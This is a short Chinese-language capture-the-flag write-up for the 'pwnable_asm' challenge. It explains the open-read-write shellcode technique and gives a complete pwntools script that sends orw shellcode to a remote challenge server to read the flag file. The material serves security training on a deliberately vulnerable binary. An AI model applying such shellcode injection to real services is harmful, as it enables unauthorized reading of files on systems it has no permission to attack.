pwnable_asm
查看保护
orw来读flag就可以了,程序在0x41414000这里创建了0x1000大小的空间,我们可以将flag拿到这里然后 输出即可。
orw其实就是open read write
open(file=‘flag’, oflag=0, mode=0);
read(3, 0x41414000, 0x100)
write(fd=1, buf=0x41414000, n=0x100)
意思就是打开flag,读取flag到0x41414000,从0x41414000中读取数据到屏幕
这里用汇编写就可以了,这题可以直接用pwntools自带的open read 和write来拿flag。
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 29493)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
offest = 0x41414000
shellcode = ''
shellcode += shellcraft.open('flag')
shellcode += shellcraft.read(3, offest, 0x100)
shellcode += shellcraft.write(1, offest, 0x100)
print(shellcode)
shellcode = asm(shellcode)
r.sendline(shellcode)
r.interactive()